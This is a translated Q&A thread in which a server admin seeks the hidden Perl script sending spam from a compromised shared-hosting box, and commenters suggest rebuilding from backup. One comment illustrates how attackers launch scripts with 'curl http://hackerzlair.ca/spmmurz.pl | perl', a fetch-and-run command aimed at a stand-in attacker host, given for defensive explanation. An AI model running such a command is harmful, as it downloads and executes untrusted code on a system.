【发布时间】:2012-03-02 19:37:05
【问题描述】:
我有一个运行 Centos 4 的 WHM 服务器(是的,我知道它只是变得不受支持)所有更新都已安装,一切似乎都是最新的。 2011 年 12 月,其中一位拥有 50 个网站的服务器所有者感染了他的计算机,病毒/木马读取了他的 FTP 保存的密码,然后通过 ftp 登录并修改了它可以找到的所有 index.php 文件,我们虽然我们全部清除。
问题如下,他们以某种方式使用 Apache 触发的 perl 脚本发送电子邮件我需要一种方法来找出他们正在触发的脚本的路径,在“ps”中它只显示作为“perl”,在检查 perl 脚本打开的文件时,它会列出所有 apache vhost 日志、apache 错误日志和 /dev/null。
我需要一种方法来找出发送电子邮件的脚本的路径,服务器现在两次被列入 spamhaus 的 CBL,“手动”搜索这不是一个选项,因为那里有 200 多个网站占用服务器上超过 100GB 的空间。
服务器没有被破坏,唯一的问题是我找不到发送垃圾邮件的脚本。
【问题讨论】:
-
尽管听起来很苛刻,但您最好的选择可能是擦除盒子并从已知良好的备份中恢复。如果您没有已知的良好备份,那么最好通过构建新服务器并在移动文件之前审查所有文件来为您服务。如果您的黑客甚至是最低限度的能力,您可能永远无法根除对系统所做的所有更改。
-
脚本不一定是本地明文文件。例如,
decrypt warez.xxx | perl或curl http://hackerzlair.ca/spmmurz.pl | perl是在系统上启动 perl 脚本的方法。